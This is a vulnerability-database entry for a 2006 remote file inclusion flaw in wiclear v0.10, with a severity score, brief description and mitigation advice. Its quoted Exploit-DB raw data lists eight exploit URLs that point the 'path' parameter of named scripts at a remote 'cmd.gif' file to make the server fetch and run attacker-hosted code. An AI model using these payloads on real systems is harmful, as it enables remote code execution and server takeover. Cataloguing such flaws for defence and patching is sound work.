wiclear v0.10 Remote File Inclusion Vulnerability

vendor:

wiclear

by:

the master (nidhal)

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: wiclear

Affected Version From: v0.10

Affected Version To: v0.10

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

wiclear v0.10 Remote File Inclusion Vulnerability

wiclear v0.10 is vulnerable to Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a malicious file which is hosted on a remote server. When the vulnerable application receives the malicious URL, it will execute the malicious file.

Mitigation:

The application should filter the user input and should not allow the user to pass malicious URLs.

Source

Exploit-DB raw data:

########################################################################
#  wiclear v0.10  Remote File Inclusion Vulnerability
#
#  Download: http://wiclear.free.fr/download/wiclear-0.10.tgz
#
#  Found By: the master (nidhal)
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/admin/inc/prepend.inc.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/inc/lib/boxes.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/inc/lib/tools.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/tools/trackback/index.php?path=http://cmd.gif?
#  http://[Target]/[Path]/admin/tools/utf8conversion/index.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/prepend.inc.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/lib/boxes.lib.php?path=http://cmd.gif?
#  http://[Target]/[Path]/inc/lib/history.lib.php?path=http://cmd.gif?
#
#
# Greetz: str0ke , Dr Max Virus , The Small Hacker , crack_man
########################################################################

# milw0rm.com [2006-10-23]